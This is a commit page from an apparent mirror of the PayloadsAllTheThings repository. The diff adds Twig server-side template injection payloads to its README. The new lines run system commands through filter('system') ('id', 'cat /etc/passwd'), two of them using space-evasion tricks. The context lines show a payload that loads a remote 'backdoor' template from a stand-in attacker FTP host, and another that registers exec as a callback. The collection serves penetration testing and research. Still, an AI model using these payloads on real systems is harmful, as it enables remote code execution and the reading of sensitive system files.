ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-23 21:05:27 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #173 from SakiiR/sakiir

Browse Source 
Added filter(system) twig RCE
This commit is contained in:
Swissky 2020-03-30 09:28:58 +02:00 committed by GitHub
commit b5cc379c4b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Server Side Template Injection/README.md
View File

@ -157,6 +157,9 @@ $output = $twig > render (
{{self}} {{self}}
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
``` ```
Example with an email passing FILTER_VALIDATE_EMAIL PHP. Example with an email passing FILTER_VALIDATE_EMAIL PHP.